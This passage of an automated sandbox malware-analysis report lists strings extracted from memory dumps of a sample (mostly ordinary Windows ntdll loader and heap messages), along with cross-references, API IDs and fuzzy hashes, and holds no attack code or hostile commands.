                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140BA3
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140BB6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140D60
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140D74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404860816-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                      • API String ID: 0-379654539
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • @, xrefs: 01138591
                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0113855E
                                                                                                      • LdrpInitializeProcess, xrefs: 01138422
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01138421
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1918872054
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011721DE
                                                                                                      • .Local, xrefs: 011328D8
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011722B6
                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011721D9, 011722B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                      • API String ID: 0-1239276146
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01160FE5
                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011610AE
                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01161028
                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0116106B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                      • API String ID: 0-1468400865
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0116A992
                                                                                                      • LdrpDynamicShimModule, xrefs: 0116A998
                                                                                                      • apphelp.dll, xrefs: 01122462
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0116A9A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-176724104
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • LdrpInitializationFailure, xrefs: 011820FA
                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 011820F3
                                                                                                      • `,, xrefs: 011820EB
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01182104
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$`,$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1034781813
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • HEAP[%wZ]: , xrefs: 01113255
                                                                                                      • HEAP: , xrefs: 01113264
                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0111327D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                      • API String ID: 0-617086771
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-4253913091
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $@
                                                                                                      • API String ID: 0-1077428164
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                      • API String ID: 0-2779062949
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0116A10F
                                                                                                      • LdrpCheckModule, xrefs: 0116A117
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0116A121
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-161242083
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-1334570610
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011782DE
                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 011782D7
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011782E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1783798831
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • @, xrefs: 011BC1F1
                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011BC1C5
                                                                                                      • PreferredUILanguages, xrefs: 011BC212
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                      • API String ID: 0-2968386058
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                      • API String ID: 0-1373925480
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01184899
                                                                                                      • LdrpCheckRedirection, xrefs: 0118488F
                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01184888
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-3154609507
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *J$7$6
                                                                                                      • API String ID: 0-2173226183
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-2558761708
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: #%u
                                                                                                      • API String ID: 48624451-232158463
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • LdrResSearchResource Exit, xrefs: 0110AA25
                                                                                                      • LdrResSearchResource Enter, xrefs: 0110AA13
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                      • API String ID: 0-4066393604
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `$`
                                                                                                      • API String ID: 0-197956300
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Legacy$UEFI
                                                                                                      • API String ID: 2994545307-634100481
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$MUI
                                                                                                      • API String ID: 0-17815947
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • kLsE, xrefs: 01100540
                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0110063D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                      • API String ID: 0-2547482624
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0110A309
                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0110A2FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                      • API String ID: 0-2876891731
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: MUI
                                                                                                      • API String ID: 0-1339004836
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: GlobalTags
                                                                                                      • API String ID: 0-1106856819
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .mui
                                                                                                      • API String ID: 0-1199573805
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: EXT-
                                                                                                      • API String ID: 0-1948896318
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryHash
                                                                                                      • API String ID: 0-2202222882
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #
                                                                                                      • API String ID: 0-1885708031
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryName
                                                                                                      • API String ID: 0-215506332
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `,
                                                                                                      • API String ID: 0-3251075597
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `,
                                                                                                      • API String ID: 0-3251075597
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0118895E
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                      • API String ID: 0-702105204
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a5764c5b3950422e46bc6cdf8425afac50ea7e37e0dc8268447e8d74fe615ea9
                                                                                                      • Instruction ID: 2645f4e2fe971514e833f0e5c50c981a51dd5ec3062c5dd0b309aa3e5893b202
                                                                                                      • Opcode Fuzzy Hash: a5764c5b3950422e46bc6cdf8425afac50ea7e37e0dc8268447e8d74fe615ea9
                                                                                                      • Instruction Fuzzy Hash: 3AD1F371A0060E9BDF0DCF69C841AFEB7F1AF89304F198169D966E7241E739E901CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 23734c89afd1d79b845e5bf066da52c5a7d002a449bd066373e7e7b8658f23cd
                                                                                                      • Instruction ID: 7773cd224d417e0ee8007aee72192db6228862d12aa659dbf4f5449f5207a905
                                                                                                      • Opcode Fuzzy Hash: 23734c89afd1d79b845e5bf066da52c5a7d002a449bd066373e7e7b8658f23cd
                                                                                                      • Instruction Fuzzy Hash: C8E1B271A08342CFC71ACF28C480A6ABBE1FF89314F15896DF59587391E771E915CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 264d1a5280f98bf75bae78f89090a3e142f17e60c2d670727b92c2568dd88bad
                                                                                                      • Instruction ID: 8814af6c621e5e90218d733f32e36864c2cf1be5ccd7fe6bea1183b8e36ebfe2
                                                                                                      • Opcode Fuzzy Hash: 264d1a5280f98bf75bae78f89090a3e142f17e60c2d670727b92c2568dd88bad
                                                                                                      • Instruction Fuzzy Hash: A3D1E571A04206DBDB18DF69C882BFE77E6BF54304F04852EEA55DB680EB30E955CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                      • Instruction ID: 9a81aa998957efa5f2f5d164652a098793f404f880eeab79b1e076e7becf83b3
                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                      • Instruction Fuzzy Hash: 36B18574A006099FDB28EF99C940EAFBBB6FF84304F94845DAA4297795DB34E905CF10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                      • Instruction ID: 211a207c707e49a2681694065e0ba8db399019a3b81d317dbe6ed606a35d3221
                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                      • Instruction Fuzzy Hash: C3B12931A00646AFDB1DCB68C850BBEFBFAAF48304F1505A9E652D7285D731DD81CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f29ad45960eae98ac349d6cf616705e73c7f46264a993e4390560546047d6eda
